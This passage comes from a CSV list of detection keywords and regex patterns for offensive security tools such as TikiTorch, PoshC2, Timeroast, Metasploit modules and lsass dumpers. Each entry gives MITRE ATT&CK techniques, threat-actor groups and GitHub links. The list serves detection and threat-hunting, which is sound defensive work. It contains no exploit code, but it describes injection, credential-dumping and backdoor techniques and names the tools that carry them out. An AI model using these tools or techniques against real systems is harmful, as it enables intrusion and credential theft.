Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiSpawn.dll*",".{0,1000}TikiSpawn\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiSpawn.exe*",".{0,1000}TikiSpawn\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiSpawn.ps1*",".{0,1000}TikiSpawn\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiSpawnAs*",".{0,1000}TikiSpawnAs.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiSpawnAsAdmin*",".{0,1000}TikiSpawnAsAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiSpawnElevated*",".{0,1000}TikiSpawnElevated.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiSpawnWOppid*",".{0,1000}TikiSpawnWOppid.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiSpawnWppid*",".{0,1000}TikiSpawnWppid.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiTorch.exe*",".{0,1000}TikiTorch\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*TikiVader.*",".{0,1000}TikiVader\..{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*timemachine_cmd_injection*",".{0,1000}timemachine_cmd_injection.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*timeroast.ps1*",".{0,1000}timeroast\.ps1.{0,1000}","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","167","17","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" "*timeroast.py*",".{0,1000}timeroast\.py.{0,1000}","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","167","17","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" "*timestomp c:*",".{0,1000}timestomp\sc\:.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 
- T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*timestomp.x64.o*",".{0,1000}timestomp\.x64\.o.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*timing_attack * --brute-force*",".{0,1000}timing_attack\s.{0,1000}\s\-\-brute\-force.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*timwhitez/Doge-Loader*",".{0,1000}timwhitez\/Doge\-Loader.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","279","59","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" "*title logon backdoor*",".{0,1000}title\slogon\sbackdoor.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*Tkn_Access_Check.ps1*",".{0,1000}Tkn_Access_Check\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*TlRMTVNTUAABAAAABYIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAwAAAA*",".{0,1000}TlRMTVNTUAABAAAABYIIAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAAwAAAA.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","ntlm decoder","10","10","936","137","2024-04-22T08:06:07Z","2020-09-06T23:02:37Z" "*TlRMTVNTUAABAAAAMpCI4gAAAAAoAAAAAAAAACgAAAAGAbEdAAAADw==*",".{0,1000}TlRMTVNTUAABAAAAMpCI4gAAAAAoAAAAAAAAACgAAAAGAbEdAAAADw\=\=.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - 
T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","8","1","33","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*TlRMTVNTUAACAAAABgAGADgAAAAFAomih5Y9EpIdLmMAAAAAAAAAAIAAgAA*",".{0,1000}TlRMTVNTUAACAAAABgAGADgAAAAFAomih5Y9EpIdLmMAAAAAAAAAAIAAgAA.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*tls-scanner -connect *:*",".{0,1000}tls\-scanner\s\-connect\s.{0,1000}\:.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*tmdb-get-company-names *",".{0,1000}tmdb\-get\-company\-names\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*tmenochet/PowerDump*",".{0,1000}tmenochet\/PowerDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" 
"*tmp*ciscophones.tgz*",".{0,1000}tmp.{0,1000}ciscophones\.tgz.{0,1000}","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","176","33","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*tmp*lsass_*.dmp*",".{0,1000}tmp.{0,1000}lsass_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*Tmprovider.dll*",".{0,1000}Tmprovider\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
